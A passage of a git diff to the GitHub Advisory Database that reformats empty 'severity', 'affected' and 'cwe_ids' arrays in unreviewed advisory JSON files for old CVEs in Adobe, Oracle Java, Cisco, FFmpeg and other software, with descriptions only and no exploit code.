"cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6fvv-fm5x-8w3r/GHSA-6fvv-fm5x-8w3r.json b/advisories/unreviewed/2022/05/GHSA-6fvv-fm5x-8w3r/GHSA-6fvv-fm5x-8w3r.json index 5fd7f7b49d4..0b89e7533ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-6fvv-fm5x-8w3r/GHSA-6fvv-fm5x-8w3r.json +++ b/advisories/unreviewed/2022/05/GHSA-6fvv-fm5x-8w3r/GHSA-6fvv-fm5x-8w3r.json @@ -7,12 +7,8 @@ "CVE-2010-3396" ], "details": "Buffer overflow in kavfm.sys in Kingsoft Antivirus 2010.04.26.648 and earlier allows local users to execute arbitrary code via a long argument to IOCTL 0x80030004. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6gvj-cjgc-qxmv/GHSA-6gvj-cjgc-qxmv.json b/advisories/unreviewed/2022/05/GHSA-6gvj-cjgc-qxmv/GHSA-6gvj-cjgc-qxmv.json index 93f92dea955..58008cba724 100644 --- a/advisories/unreviewed/2022/05/GHSA-6gvj-cjgc-qxmv/GHSA-6gvj-cjgc-qxmv.json +++ b/advisories/unreviewed/2022/05/GHSA-6gvj-cjgc-qxmv/GHSA-6gvj-cjgc-qxmv.json @@ -7,12 +7,8 @@ "CVE-2010-3574" ], "details": "Unspecified vulnerability in the Networking component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that HttpURLConnection does not properly check for the allowHttpTrace permission, which allows untrusted code to perform HTTP TRACE requests.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -176,9 +172,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6h43-3p3w-2945/GHSA-6h43-3p3w-2945.json b/advisories/unreviewed/2022/05/GHSA-6h43-3p3w-2945/GHSA-6h43-3p3w-2945.json index 14522e61016..7de161130f3 100644 --- a/advisories/unreviewed/2022/05/GHSA-6h43-3p3w-2945/GHSA-6h43-3p3w-2945.json +++ b/advisories/unreviewed/2022/05/GHSA-6h43-3p3w-2945/GHSA-6h43-3p3w-2945.json @@ -7,12 +7,8 @@ "CVE-2011-3481" ], "details": "The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6hc8-r2j3-8r4p/GHSA-6hc8-r2j3-8r4p.json b/advisories/unreviewed/2022/05/GHSA-6hc8-r2j3-8r4p/GHSA-6hc8-r2j3-8r4p.json index feaa03bc92f..4ddedbcae57 100644 --- a/advisories/unreviewed/2022/05/GHSA-6hc8-r2j3-8r4p/GHSA-6hc8-r2j3-8r4p.json +++ b/advisories/unreviewed/2022/05/GHSA-6hc8-r2j3-8r4p/GHSA-6hc8-r2j3-8r4p.json @@ -7,12 +7,8 @@ "CVE-2010-3975" ], "details": "Untrusted search path vulnerability in Adobe Flash Player 9 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as a file that is processed by Flash.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -28,9 +24,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6hfw-45v2-4p3j/GHSA-6hfw-45v2-4p3j.json b/advisories/unreviewed/2022/05/GHSA-6hfw-45v2-4p3j/GHSA-6hfw-45v2-4p3j.json index c3edc3d0f61..07ad2bcd9a3 100644 --- a/advisories/unreviewed/2022/05/GHSA-6hfw-45v2-4p3j/GHSA-6hfw-45v2-4p3j.json +++ b/advisories/unreviewed/2022/05/GHSA-6hfw-45v2-4p3j/GHSA-6hfw-45v2-4p3j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6j55-6hf8-fxvj/GHSA-6j55-6hf8-fxvj.json b/advisories/unreviewed/2022/05/GHSA-6j55-6hf8-fxvj/GHSA-6j55-6hf8-fxvj.json index 9bfb57c931c..5301f01766f 100644 --- a/advisories/unreviewed/2022/05/GHSA-6j55-6hf8-fxvj/GHSA-6j55-6hf8-fxvj.json +++ b/advisories/unreviewed/2022/05/GHSA-6j55-6hf8-fxvj/GHSA-6j55-6hf8-fxvj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6jg7-p8g9-qgpw/GHSA-6jg7-p8g9-qgpw.json b/advisories/unreviewed/2022/05/GHSA-6jg7-p8g9-qgpw/GHSA-6jg7-p8g9-qgpw.json index 3353a9ec3e4..baed7466b07 100644 --- a/advisories/unreviewed/2022/05/GHSA-6jg7-p8g9-qgpw/GHSA-6jg7-p8g9-qgpw.json +++ b/advisories/unreviewed/2022/05/GHSA-6jg7-p8g9-qgpw/GHSA-6jg7-p8g9-qgpw.json @@ -7,12 +7,8 @@ "CVE-2012-1365" ], "details": "Cisco Unified Computing System (UCS) 1.4 and 2.0 allows remote authenticated users to cause a denial of service (device reload) via a malformed SNMP request to a Fabric Interconnect (FI) device, aka Bug ID CSCts32463.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6jmc-wgh2-9jr6/GHSA-6jmc-wgh2-9jr6.json b/advisories/unreviewed/2022/05/GHSA-6jmc-wgh2-9jr6/GHSA-6jmc-wgh2-9jr6.json index ce2be348c5d..0e096099f00 100644 --- a/advisories/unreviewed/2022/05/GHSA-6jmc-wgh2-9jr6/GHSA-6jmc-wgh2-9jr6.json +++ b/advisories/unreviewed/2022/05/GHSA-6jmc-wgh2-9jr6/GHSA-6jmc-wgh2-9jr6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6jrp-vphp-47x9/GHSA-6jrp-vphp-47x9.json b/advisories/unreviewed/2022/05/GHSA-6jrp-vphp-47x9/GHSA-6jrp-vphp-47x9.json index 9b6e5733aa1..2df95f36c20 100644 --- a/advisories/unreviewed/2022/05/GHSA-6jrp-vphp-47x9/GHSA-6jrp-vphp-47x9.json +++ b/advisories/unreviewed/2022/05/GHSA-6jrp-vphp-47x9/GHSA-6jrp-vphp-47x9.json @@ -7,12 +7,8 @@ "CVE-2013-0995" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6jxx-vp42-6rcv/GHSA-6jxx-vp42-6rcv.json b/advisories/unreviewed/2022/05/GHSA-6jxx-vp42-6rcv/GHSA-6jxx-vp42-6rcv.json index 413d65e9391..a1ea277d59f 100644 --- a/advisories/unreviewed/2022/05/GHSA-6jxx-vp42-6rcv/GHSA-6jxx-vp42-6rcv.json +++ b/advisories/unreviewed/2022/05/GHSA-6jxx-vp42-6rcv/GHSA-6jxx-vp42-6rcv.json @@ -7,12 +7,8 @@ "CVE-2010-3557" ], "details": "Unspecified vulnerability in the Swing component in Oracle Java SE and Java for Business 6 Update 21, 5.0 Update 25, 1.4.2_27, and 1.3.1_28 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2010 CPU. Oracle has not commented on claims from a reliable downstream vendor that this is related to the modification of \"behavior and state of certain JDK classes\" and \"mutable static.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -156,9 +152,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6mcm-xc38-6p28/GHSA-6mcm-xc38-6p28.json b/advisories/unreviewed/2022/05/GHSA-6mcm-xc38-6p28/GHSA-6mcm-xc38-6p28.json index 4ce3a7bf116..3375beb9bfe 100644 --- a/advisories/unreviewed/2022/05/GHSA-6mcm-xc38-6p28/GHSA-6mcm-xc38-6p28.json +++ b/advisories/unreviewed/2022/05/GHSA-6mcm-xc38-6p28/GHSA-6mcm-xc38-6p28.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6mhv-9623-3chf/GHSA-6mhv-9623-3chf.json b/advisories/unreviewed/2022/05/GHSA-6mhv-9623-3chf/GHSA-6mhv-9623-3chf.json index 73b0a99865c..363058e299a 100644 --- a/advisories/unreviewed/2022/05/GHSA-6mhv-9623-3chf/GHSA-6mhv-9623-3chf.json +++ b/advisories/unreviewed/2022/05/GHSA-6mhv-9623-3chf/GHSA-6mhv-9623-3chf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6p4c-6mx2-r9cv/GHSA-6p4c-6mx2-r9cv.json b/advisories/unreviewed/2022/05/GHSA-6p4c-6mx2-r9cv/GHSA-6p4c-6mx2-r9cv.json index 6d11d086907..e26aa6de0fd 100644 --- a/advisories/unreviewed/2022/05/GHSA-6p4c-6mx2-r9cv/GHSA-6p4c-6mx2-r9cv.json +++ b/advisories/unreviewed/2022/05/GHSA-6p4c-6mx2-r9cv/GHSA-6p4c-6mx2-r9cv.json @@ -7,12 +7,8 @@ "CVE-2010-4475" ], "details": "Unspecified vulnerability in the Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Deployment, a different vulnerability than CVE-2010-4447.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -76,9 +72,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6qx2-9w3m-q5pm/GHSA-6qx2-9w3m-q5pm.json b/advisories/unreviewed/2022/05/GHSA-6qx2-9w3m-q5pm/GHSA-6qx2-9w3m-q5pm.json index 65527f10f26..3254bada2d1 100644 --- a/advisories/unreviewed/2022/05/GHSA-6qx2-9w3m-q5pm/GHSA-6qx2-9w3m-q5pm.json +++ b/advisories/unreviewed/2022/05/GHSA-6qx2-9w3m-q5pm/GHSA-6qx2-9w3m-q5pm.json @@ -7,12 +7,8 @@ "CVE-2010-2889" ], "details": "Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted font, a different vulnerability than CVE-2010-3626.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6r33-j6p5-rmff/GHSA-6r33-j6p5-rmff.json b/advisories/unreviewed/2022/05/GHSA-6r33-j6p5-rmff/GHSA-6r33-j6p5-rmff.json index ca8ec924e2b..90f338d7f26 100644 --- a/advisories/unreviewed/2022/05/GHSA-6r33-j6p5-rmff/GHSA-6r33-j6p5-rmff.json +++ b/advisories/unreviewed/2022/05/GHSA-6r33-j6p5-rmff/GHSA-6r33-j6p5-rmff.json @@ -7,12 +7,8 @@ "CVE-2012-1364" ], "details": "Cisco Unified Computing System (UCS) 1.4 and 2.0 allows remote authenticated users to cause a denial of service (device reload) via a malformed SNMP request to a Fabric Interconnect (FI) device, aka Bug ID CSCts32452.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -24,9 +20,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6r49-j2p6-g729/GHSA-6r49-j2p6-g729.json b/advisories/unreviewed/2022/05/GHSA-6r49-j2p6-g729/GHSA-6r49-j2p6-g729.json index c7ef54ea55a..b9c085a325b 100644 --- a/advisories/unreviewed/2022/05/GHSA-6r49-j2p6-g729/GHSA-6r49-j2p6-g729.json +++ b/advisories/unreviewed/2022/05/GHSA-6r49-j2p6-g729/GHSA-6r49-j2p6-g729.json @@ -7,12 +7,8 @@ "CVE-2012-0768" ], "details": "The Matrix3D component in Adobe Flash Player before 10.3.183.16 and 11.x before 11.1.102.63 on Windows, Mac OS X, Linux, and Solaris; before 11.1.111.7 on Android 2.x and 3.x; and before 11.1.115.7 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6rw5-j2pq-7mmw/GHSA-6rw5-j2pq-7mmw.json b/advisories/unreviewed/2022/05/GHSA-6rw5-j2pq-7mmw/GHSA-6rw5-j2pq-7mmw.json index 60bfe257b15..85f05fdcb26 100644 --- a/advisories/unreviewed/2022/05/GHSA-6rw5-j2pq-7mmw/GHSA-6rw5-j2pq-7mmw.json +++ b/advisories/unreviewed/2022/05/GHSA-6rw5-j2pq-7mmw/GHSA-6rw5-j2pq-7mmw.json @@ -7,12 +7,8 @@ "CVE-2008-5733" ], "details": "SQL injection vulnerability in blog.php in the Team Impact TI Blog System mod for PHP-Fusion allows remote attackers to execute arbitrary SQL commands via the id parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6v8q-f99w-979p/GHSA-6v8q-f99w-979p.json b/advisories/unreviewed/2022/05/GHSA-6v8q-f99w-979p/GHSA-6v8q-f99w-979p.json index 1c7a5be16af..de6ad7dcfa4 100644 --- a/advisories/unreviewed/2022/05/GHSA-6v8q-f99w-979p/GHSA-6v8q-f99w-979p.json +++ b/advisories/unreviewed/2022/05/GHSA-6v8q-f99w-979p/GHSA-6v8q-f99w-979p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6x8x-9422-rjp5/GHSA-6x8x-9422-rjp5.json b/advisories/unreviewed/2022/05/GHSA-6x8x-9422-rjp5/GHSA-6x8x-9422-rjp5.json index cf3cccacdfe..1f68e95e12f 100644 --- a/advisories/unreviewed/2022/05/GHSA-6x8x-9422-rjp5/GHSA-6x8x-9422-rjp5.json +++ b/advisories/unreviewed/2022/05/GHSA-6x8x-9422-rjp5/GHSA-6x8x-9422-rjp5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6xrv-8cp2-4hf8/GHSA-6xrv-8cp2-4hf8.json b/advisories/unreviewed/2022/05/GHSA-6xrv-8cp2-4hf8/GHSA-6xrv-8cp2-4hf8.json index 52c36bf0125..8d7840e0b24 100644 --- a/advisories/unreviewed/2022/05/GHSA-6xrv-8cp2-4hf8/GHSA-6xrv-8cp2-4hf8.json +++ b/advisories/unreviewed/2022/05/GHSA-6xrv-8cp2-4hf8/GHSA-6xrv-8cp2-4hf8.json @@ -7,12 +7,8 @@ "CVE-2011-0588" ], "details": "Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0562 and CVE-2011-0570.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7296-4jc6-3mmc/GHSA-7296-4jc6-3mmc.json b/advisories/unreviewed/2022/05/GHSA-7296-4jc6-3mmc/GHSA-7296-4jc6-3mmc.json index 415e43eb19e..66b20fb3310 100644 --- a/advisories/unreviewed/2022/05/GHSA-7296-4jc6-3mmc/GHSA-7296-4jc6-3mmc.json +++ b/advisories/unreviewed/2022/05/GHSA-7296-4jc6-3mmc/GHSA-7296-4jc6-3mmc.json @@ -7,12 +7,8 @@ "CVE-2013-1010" ], "details": "WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-72r9-rj28-f4wj/GHSA-72r9-rj28-f4wj.json b/advisories/unreviewed/2022/05/GHSA-72r9-rj28-f4wj/GHSA-72r9-rj28-f4wj.json index 6e1f14e77fd..d99c0cc0f05 100644 --- a/advisories/unreviewed/2022/05/GHSA-72r9-rj28-f4wj/GHSA-72r9-rj28-f4wj.json +++ b/advisories/unreviewed/2022/05/GHSA-72r9-rj28-f4wj/GHSA-72r9-rj28-f4wj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-739r-v5c6-g4wv/GHSA-739r-v5c6-g4wv.json b/advisories/unreviewed/2022/05/GHSA-739r-v5c6-g4wv/GHSA-739r-v5c6-g4wv.json index 9f974c50e9a..6d7dc253495 100644 --- a/advisories/unreviewed/2022/05/GHSA-739r-v5c6-g4wv/GHSA-739r-v5c6-g4wv.json +++ b/advisories/unreviewed/2022/05/GHSA-739r-v5c6-g4wv/GHSA-739r-v5c6-g4wv.json @@ -7,12 +7,8 @@ "CVE-2010-2182" ], "details": "Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-2160, CVE-2010-2165, CVE-2010-2166, CVE-2010-2171, CVE-2010-2175, CVE-2010-2176, CVE-2010-2177, CVE-2010-2178, CVE-2010-2180, CVE-2010-2184, CVE-2010-2187, and CVE-2010-2188.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-753x-9q2q-hv3r/GHSA-753x-9q2q-hv3r.json b/advisories/unreviewed/2022/05/GHSA-753x-9q2q-hv3r/GHSA-753x-9q2q-hv3r.json index 31eeb390d56..1ca38e83b8d 100644 --- a/advisories/unreviewed/2022/05/GHSA-753x-9q2q-hv3r/GHSA-753x-9q2q-hv3r.json +++ b/advisories/unreviewed/2022/05/GHSA-753x-9q2q-hv3r/GHSA-753x-9q2q-hv3r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-763v-33mm-cgwq/GHSA-763v-33mm-cgwq.json b/advisories/unreviewed/2022/05/GHSA-763v-33mm-cgwq/GHSA-763v-33mm-cgwq.json index 7cbd8fee55b..f1c0c4733f2 100644 --- a/advisories/unreviewed/2022/05/GHSA-763v-33mm-cgwq/GHSA-763v-33mm-cgwq.json +++ b/advisories/unreviewed/2022/05/GHSA-763v-33mm-cgwq/GHSA-763v-33mm-cgwq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7677-v8cp-hpxg/GHSA-7677-v8cp-hpxg.json b/advisories/unreviewed/2022/05/GHSA-7677-v8cp-hpxg/GHSA-7677-v8cp-hpxg.json index 5b3ed50236c..8b537f341bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-7677-v8cp-hpxg/GHSA-7677-v8cp-hpxg.json +++ b/advisories/unreviewed/2022/05/GHSA-7677-v8cp-hpxg/GHSA-7677-v8cp-hpxg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-768r-jccv-hcw3/GHSA-768r-jccv-hcw3.json b/advisories/unreviewed/2022/05/GHSA-768r-jccv-hcw3/GHSA-768r-jccv-hcw3.json index b8ef8095258..76a194c7a43 100644 --- a/advisories/unreviewed/2022/05/GHSA-768r-jccv-hcw3/GHSA-768r-jccv-hcw3.json +++ b/advisories/unreviewed/2022/05/GHSA-768r-jccv-hcw3/GHSA-768r-jccv-hcw3.json @@ -7,12 +7,8 @@ "CVE-2008-4817" ], "details": "The Download Manager in Adobe Acrobat Professional and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a crafted PDF document that calls an AcroJS function with a long string argument, triggering heap corruption.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-772j-8vvr-w4hx/GHSA-772j-8vvr-w4hx.json b/advisories/unreviewed/2022/05/GHSA-772j-8vvr-w4hx/GHSA-772j-8vvr-w4hx.json index efda964c01c..a9814f49f2b 100644 --- a/advisories/unreviewed/2022/05/GHSA-772j-8vvr-w4hx/GHSA-772j-8vvr-w4hx.json +++ b/advisories/unreviewed/2022/05/GHSA-772j-8vvr-w4hx/GHSA-772j-8vvr-w4hx.json @@ -7,12 +7,8 @@ "CVE-2012-2789" ], "details": "Unspecified vulnerability in the avi_read_packet function in libavformat/avidec.c in FFmpeg before 0.11, and Libav 0.7.x before 0.7.7 and 0.8.x before 0.8.4, has unknown impact and attack vectors, related to a large number of vector coded coefficients (num_vec_coeffs).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -60,9 +56,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7763-g9rg-h2q4/GHSA-7763-g9rg-h2q4.json b/advisories/unreviewed/2022/05/GHSA-7763-g9rg-h2q4/GHSA-7763-g9rg-h2q4.json index f9253984e78..ddd0b8889ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-7763-g9rg-h2q4/GHSA-7763-g9rg-h2q4.json +++ b/advisories/unreviewed/2022/05/GHSA-7763-g9rg-h2q4/GHSA-7763-g9rg-h2q4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-77gj-ppr3-52m7/GHSA-77gj-ppr3-52m7.json b/advisories/unreviewed/2022/05/GHSA-77gj-ppr3-52m7/GHSA-77gj-ppr3-52m7.json index 61c8d3e0c29..b2843dc2da1 100644 --- a/advisories/unreviewed/2022/05/GHSA-77gj-ppr3-52m7/GHSA-77gj-ppr3-52m7.json +++ b/advisories/unreviewed/2022/05/GHSA-77gj-ppr3-52m7/GHSA-77gj-ppr3-52m7.json @@ -7,12 +7,8 @@ "CVE-2008-6961" ], "details": "mailnews in Mozilla Thunderbird before 2.0.0.18 and SeaMonkey before 1.1.13, when JavaScript is enabled in mail, allows remote attackers to obtain sensitive information about the recipient, or comments in forwarded mail, via script that reads the (1) .documentURI or (2) .textContent DOM properties.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-77j8-57q3-5v26/GHSA-77j8-57q3-5v26.json b/advisories/unreviewed/2022/05/GHSA-77j8-57q3-5v26/GHSA-77j8-57q3-5v26.json index 44b21f8681f..38ba3c90a10 100644 --- a/advisories/unreviewed/2022/05/GHSA-77j8-57q3-5v26/GHSA-77j8-57q3-5v26.json +++ b/advisories/unreviewed/2022/05/GHSA-77j8-57q3-5v26/GHSA-77j8-57q3-5v26.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7877-m5c6-fgmx/GHSA-7877-m5c6-fgmx.json b/advisories/unreviewed/2022/05/GHSA-7877-m5c6-fgmx/GHSA-7877-m5c6-fgmx.json index 88033abc88a..e3f0006b348 100644 --- a/advisories/unreviewed/2022/05/GHSA-7877-m5c6-fgmx/GHSA-7877-m5c6-fgmx.json +++ b/advisories/unreviewed/2022/05/GHSA-7877-m5c6-fgmx/GHSA-7877-m5c6-fgmx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-78h7-gxcg-7x5r/GHSA-78h7-gxcg-7x5r.json b/advisories/unreviewed/2022/05/GHSA-78h7-gxcg-7x5r/GHSA-78h7-gxcg-7x5r.json index 600f7fbed7b..4b16c1cf825 100644 --- a/advisories/unreviewed/2022/05/GHSA-78h7-gxcg-7x5r/GHSA-78h7-gxcg-7x5r.json +++ b/advisories/unreviewed/2022/05/GHSA-78h7-gxcg-7x5r/GHSA-78h7-gxcg-7x5r.json @@ -7,12 +7,8 @@ "CVE-2011-3504" ], "details": "The Matroska format decoder in FFmpeg before 0.8.3 does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": 